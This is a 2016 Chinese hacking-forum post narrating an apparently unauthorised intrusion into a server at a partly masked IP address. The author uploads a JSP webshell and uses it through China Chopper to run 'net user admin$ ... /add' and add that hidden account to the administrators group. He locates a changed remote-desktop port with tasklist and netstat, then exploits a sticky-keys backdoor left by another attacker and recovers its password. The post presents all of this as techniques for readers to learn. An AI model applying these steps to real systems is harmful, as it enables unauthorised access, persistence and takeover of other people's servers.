|
这次的目标:http://111.121.xxx.18
漏洞纯在我们就直接上传jsp木马好了 拿到shell 进入网站的目录
看到网站的目录没有太多的限制jsp的网站权限都很高的 我们可以直接在菜刀里面执行cmd命令 进行提权命令 net user admin$ xxxxxx /add 加用户 net localgroup administrators admin$ /add 提升到管理员组 命令结束,我们链接服务器。这台服务器,端口是被更改了,那么我们需要查到远程端口 第一: Tasklist/SVC 列出所有进程,终端所对应的服务名为:TermService 第二:用netstat -ano命令,找到PID值所对应的端口
端口是1708 执行第二条命令
对应PID1708的端口是3390 那么我们远程连接3390
链接之后我们输入我们提取的账号密码 正常到了这一步我们是可以直接进入服务器的。但是这里我遇到了一个问题就是 权限不够
这里的问题有很多可能是管理做了手脚也可能是别的黑客做了手脚遇到这种情况我的直觉告诉我这台服务器已经被黑了!黑客都喜欢留后门那么我们连续按shift 3下
出现黑客留下的后门 那么这么办呢我输入了几下弱口令 失败. 然后我对黑客的后门进行了分析这很可能是一个易语言程序黑客可能还存在服务器的某个文件夹中
在菜刀我找到了黑客纯后门的地方并下载到我自己的电脑进行分析
这便是黑客的密码19900819。 这里没有什么技巧只是经验我们结合他的第二个输入框来确定密码(确定和取消)
OK
这是一个渗透的思路分享 希望各位从中学到一些技巧。
| 
窥视卡
雷达卡
发表于 2016-2-6 13:39:21
收藏
转播
分享
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜